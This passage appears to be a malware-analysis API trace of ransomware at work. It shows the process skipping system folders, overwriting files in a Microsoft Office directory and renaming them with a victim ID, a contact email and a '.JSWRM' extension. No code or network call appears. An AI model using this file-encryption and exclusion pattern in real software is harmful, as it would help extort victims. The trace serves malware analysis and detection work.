Flags=0x0, Size=0x30) returned 0x22d260 [0131.440] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0131.440] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0131.440] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a300 [0131.440] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a300, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0131.440] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a300 | out: hHeap=0x1e0000) returned 1 [0131.440] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf0) returned 0x2477a0 [0131.440] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x166) returned 0x1ff448 [0131.440] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0131.440] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0131.440] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolData\\groove.net\\CommonData\\MessageBoxIconImagesMask.bmp" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\tooldata\\groove.net\\commondata\\messageboxiconimagesmask.bmp"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolData\\groove.net\\CommonData\\MessageBoxIconImagesMask.bmp.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\tooldata\\groove.net\\commondata\\messageboxiconimagesmask.bmp.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0131.441] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ff448 | out: hHeap=0x1e0000) returned 1 [0131.441] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0131.441] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2475b0 | out: hHeap=0x1e0000) returned 1 [0131.441] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0131.441] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0131.441] FindNextFileW (in: hFindFile=0x231f80, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x198634b7, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x198634b7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x198634b7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1fec, dwReserved0=0x60002, dwReserved1=0x2175ae, cFileName="UnreadIcon.jpg", cAlternateFileName="UNREAD~2.JPG")) returned 1 [0131.441] lstrcmpiW (lpString1="UnreadIcon.jpg", lpString2=".") returned 1 [0131.441] lstrcmpiW (lpString1="UnreadIcon.jpg", lpString2="..") returned 1 [0131.441] lstrcmpiW (lpString1="UnreadIcon.jpg", lpString2="...") returned 1 [0131.441] lstrcmpiW (lpString1="UnreadIcon.jpg", lpString2="windows") returned -1 [0131.441] lstrcmpiW (lpString1="UnreadIcon.jpg", lpString2="recovery") returned 1 [0131.441] lstrcmpiW (lpString1="UnreadIcon.jpg", lpString2="perflogs") returned 1 [0131.441] lstrcmpiW (lpString1="UnreadIcon.jpg", lpString2="documents and settings") returned 1 [0131.441] lstrcmpiW (lpString1="UnreadIcon.jpg", lpString2="$RECYCLE.BIN") returned 1 [0131.441] lstrcmpiW (lpString1="UnreadIcon.jpg", lpString2="system volume information") returned 1 [0131.441] lstrcmpiW (lpString1="UnreadIcon.jpg", lpString2="msocache") returned 1 [0131.441] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0131.442] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="UnreadIcon.jpg", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0131.442] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="UnreadIcon.jpg", cchWideChar=14, lpMultiByteStr=0x345e1a0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UnreadIcon.jpg", lpUsedDefaultChar=0x0) returned 14 [0131.442] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0131.442] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0131.442] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="UnreadIcon.jpg", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0131.442] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="UnreadIcon.jpg", cchWideChar=14, lpMultiByteStr=0x345e170, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UnreadIcon.jpg", lpUsedDefaultChar=0x0) returned 14 [0131.442] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0131.442] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ea18 [0131.442] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0131.442] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0131.442] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345dec4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0131.442] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22dd70 [0131.442] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolData\\groove.net\\CommonData\\UnreadIcon.jpg" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\tooldata\\groove.net\\commondata\\unreadicon.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x264 [0131.443] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x345de58 | out: lpFileSize=0x345de58*=8172) returned 1 [0131.443] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.443] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1fe0) returned 0x27b348 [0131.443] ReadFile (in: hFile=0x264, lpBuffer=0x27b348, nNumberOfBytesToRead=0x1fe0, lpNumberOfBytesRead=0x345de64, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345de64*=0x1fe0, lpOverlapped=0x0) returned 1 [0131.445] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.445] WriteFile (in: hFile=0x264, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x1fe0, lpNumberOfBytesWritten=0x345de60, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345de60*=0x1fe0, lpOverlapped=0x0) returned 1 [0131.445] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x27b348 | out: hHeap=0x1e0000) returned 1 [0131.445] CloseHandle (hObject=0x264) returned 1 [0131.445] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22e358 [0131.445] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0131.445] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0131.445] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0131.445] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0131.445] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0131.445] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0131.445] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a4b0 [0131.445] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a4b0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0131.445] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a4b0 | out: hHeap=0x1e0000) returned 1 [0131.445] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22bad8 [0131.445] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0131.445] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bad8 | out: hHeap=0x1e0000) returned 1 [0131.445] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0131.445] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolData\\groove.net\\CommonData\\UnreadIcon.jpg" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\tooldata\\groove.net\\commondata\\unreadicon.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolData\\groove.net\\CommonData\\UnreadIcon.jpg.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\tooldata\\groove.net\\commondata\\unreadicon.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0131.446] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0131.446] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22e358 | out: hHeap=0x1e0000) returned 1 [0131.446] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22dd70 | out: hHeap=0x1e0000) returned 1 [0131.446] FindNextFileW (in: hFindFile=0x231f80, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x198634b7, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x198634b7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x198634b7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1ffe, dwReserved0=0x60002, dwReserved1=0x2175ae, cFileName="UnreadIconImages.jpg", cAlternateFileName="UNREAD~1.JPG")) returned 1 [0131.446] lstrcmpiW (lpString1="UnreadIconImages.jpg", lpString2=".") returned 1 [0131.446] lstrcmpiW (lpString1="UnreadIconImages.jpg", lpString2="..") returned 1 [0131.446] lstrcmpiW (lpString1="UnreadIconImages.jpg", lpString2="...") returned 1 [0131.446] lstrcmpiW (lpString1="UnreadIconImages.jpg", lpString2="windows") returned -1 [0131.446] lstrcmpiW (lpString1="UnreadIconImages.jpg", lpString2="recovery") returned 1 [0131.446] lstrcmpiW (lpString1="UnreadIconImages.jpg", lpString2="perflogs") returned 1 [0131.446] lstrcmpiW (lpString1="UnreadIconImages.jpg", lpString2="documents and settings") returned 1 [0131.447] lstrcmpiW (lpString1="UnreadIconImages.jpg", lpString2="$RECYCLE.BIN") returned 1 [0131.447] lstrcmpiW (lpString1="UnreadIconImages.jpg", lpString2="system volume information") returned 1 [0131.447] lstrcmpiW (lpString1="UnreadIconImages.jpg", lpString2="msocache") returned 1 [0131.447] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0131.447] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="UnreadIconImages.jpg", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0131.447] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0131.447] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="UnreadIconImages.jpg", cchWideChar=20, lpMultiByteStr=0x2412b8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UnreadIconImages.jpg", lpUsedDefaultChar=0x0) returned 20 [0131.447] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0131.447] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0131.447] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="UnreadIconImages.jpg", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0131.447] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0131.447] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="UnreadIconImages.jpg", cchWideChar=20, lpMultiByteStr=0x2411c8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UnreadIconImages.jpg", lpUsedDefaultChar=0x0) returned 20 [0131.447] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0131.447] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22bad8 [0131.447] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ea18 | out: hHeap=0x1e0000) returned 1 [0131.447] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0131.447] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345dec4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0131.447] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22bbc0 [0131.447] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolData\\groove.net\\CommonData\\UnreadIconImages.jpg" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\tooldata\\groove.net\\commondata\\unreadiconimages.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x264 [0131.448] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x345de58 | out: lpFileSize=0x345de58*=8190) returned 1 [0131.448] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.448] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1ff0) returned 0x27b348 [0131.448] ReadFile (in: hFile=0x264, lpBuffer=0x27b348, nNumberOfBytesToRead=0x1ff0, lpNumberOfBytesRead=0x345de64, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345de64*=0x1ff0, lpOverlapped=0x0) returned 1 [0131.458] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.458] WriteFile (in: hFile=0x264, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x1ff0, lpNumberOfBytesWritten=0x345de60, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345de60*=0x1ff0, lpOverlapped=0x0) returned 1 [0131.458] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x27b348 | out: hHeap=0x1e0000) returned 1 [0131.458] CloseHandle (hObject=0x264) returned 1 [0131.458] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b1c8 [0131.458] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0131.458] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0131.458] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0131.458] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0131.458] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0131.458] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0131.458] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0131.458] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0131.458] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0131.458] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b908 [0131.458] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0131.458] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b908 | out: hHeap=0x1e0000) returned 1 [0131.458] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0131.458] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolData\\groove.net\\CommonData\\UnreadIconImages.jpg" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\tooldata\\groove.net\\commondata\\unreadiconimages.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolData\\groove.net\\CommonData\\UnreadIconImages.jpg.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\tooldata\\groove.net\\commondata\\unreadiconimages.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0131.460] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0131.460] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b1c8 | out: hHeap=0x1e0000) returned 1 [0131.460] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bbc0 | out: hHeap=0x1e0000) returned 1 [0131.460] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0131.460] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0131.460] FindNextFileW (in: hFindFile=0x231f80, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x19889710, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x19889710, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x198afa29, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5a4, dwReserved0=0x60002, dwReserved1=0x2175ae, cFileName="UnreadIconImagesMask.bmp", cAlternateFileName="UNREAD~1.BMP")) returned 1 [0131.460] lstrcmpiW (lpString1="UnreadIconImagesMask.bmp", lpString2=".") returned 1 [0131.460] lstrcmpiW (lpString1="UnreadIconImagesMask.bmp", lpString2="..") returned 1 [0131.460] lstrcmpiW (lpString1="UnreadIconImagesMask.bmp", lpString2="...") returned 1 [0131.460] lstrcmpiW (lpString1="UnreadIconImagesMask.bmp", lpString2="windows") returned -1 [0131.460] lstrcmpiW (lpString1="UnreadIconImagesMask.bmp", lpString2="recovery") returned 1 [0131.460] lstrcmpiW (lpString1="UnreadIconImagesMask.bmp", lpString2="perflogs") returned 1 [0131.460] lstrcmpiW (lpString1="UnreadIconImagesMask.bmp", lpString2="documents and settings") returned 1 [0131.460] lstrcmpiW (lpString1="UnreadIconImagesMask.bmp", lpString2="$RECYCLE.BIN") returned 1 [0131.460] lstrcmpiW (lpString1="UnreadIconImagesMask.bmp", lpString2="system volume information") returned 1 [0131.460] lstrcmpiW (lpString1="UnreadIconImagesMask.bmp", lpString2="msocache") returned 1 [0131.460] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0131.460] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="UnreadIconImagesMask.bmp", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0131.460] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0131.460] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="UnreadIconImagesMask.bmp", cchWideChar=24, lpMultiByteStr=0x241038, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UnreadIconImagesMask.bmp", lpUsedDefaultChar=0x0) returned 24 [0131.460] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0131.460] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0131.460] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="UnreadIconImagesMask.bmp", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0131.460] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0131.460] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="UnreadIconImagesMask.bmp", cchWideChar=24, lpMultiByteStr=0x240fe8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UnreadIconImagesMask.bmp", lpUsedDefaultChar=0x0) returned 24 [0131.460] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0131.460] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22ae28 [0131.460] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bad8 | out: hHeap=0x1e0000) returned 1 [0131.460] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0131.460] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345dec4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0131.460] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22bad8 [0131.460] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolData\\groove.net\\CommonData\\UnreadIconImagesMask.bmp" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\tooldata\\groove.net\\commondata\\unreadiconimagesmask.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x264 [0131.462] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x345de58 | out: lpFileSize=0x345de58*=1444) returned 1 [0131.462] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.462] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5a0) returned 0x2332c0 [0131.462] ReadFile (in: hFile=0x264, lpBuffer=0x2332c0, nNumberOfBytesToRead=0x5a0, lpNumberOfBytesRead=0x345de64, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesRead=0x345de64*=0x5a0, lpOverlapped=0x0) returned 1 [0131.464] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.464] WriteFile (in: hFile=0x264, lpBuffer=0x2332c0*, nNumberOfBytesToWrite=0x5a0, lpNumberOfBytesWritten=0x345de60, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesWritten=0x345de60*=0x5a0, lpOverlapped=0x0) returned 1 [0131.464] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2332c0 | out: hHeap=0x1e0000) returned 1 [0131.464] CloseHandle (hObject=0x264) returned 1 [0131.464] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b568 [0131.464] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0131.464] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0131.464] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0131.464] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0131.464] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0131.464] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, 